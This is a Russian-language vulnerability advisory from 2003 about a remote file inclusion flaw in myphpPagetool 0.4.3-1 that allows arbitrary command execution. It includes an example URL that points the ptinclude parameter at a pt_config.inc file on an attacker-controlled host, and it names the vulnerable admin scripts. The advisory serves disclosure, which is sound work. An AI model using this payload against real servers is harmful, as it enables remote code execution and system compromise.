Выполнение произвольных команд в myphpPagetool

Дата публикации:
05.02.2003
Всего просмотров:
1021
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
myphpPagetool
Описание: Уязвимость включения файла обнаружена в myphpPagetool. Удаленный пользователь может выполнять произвольные команды оболочки на уязвимом сервере.

Как сообщается, несколько сценариев myphpPagetool включают файл 'pt_config.inc'. Если установлена PHP опция 'register_globals=ON', то удаленный пользователь может определить удаленное местоположение для 'pt_config.inc' файла, заставляя целевой сервер выполнить PHP код, содержащийся в этом файле. PHP код может содержать команды оболочки операционной системы. Пример:

http://[target]/doc/admin/index.php?ptinclude=http://[atta cker]
где - http://[attacker]/pt_config.inc
Уязвимые файлы расположены в каталоге /doc/admin/ - index.php, help1.php, help2.php, help3.php, help4.php, help5.php, help6.php, help7.php, help8.php, и help9.php.

Уязвимость обнаружена в myphpPagetool 0.4.3-1

Ссылки: myphpPagetool (php)

или введите имя

CAPTCHA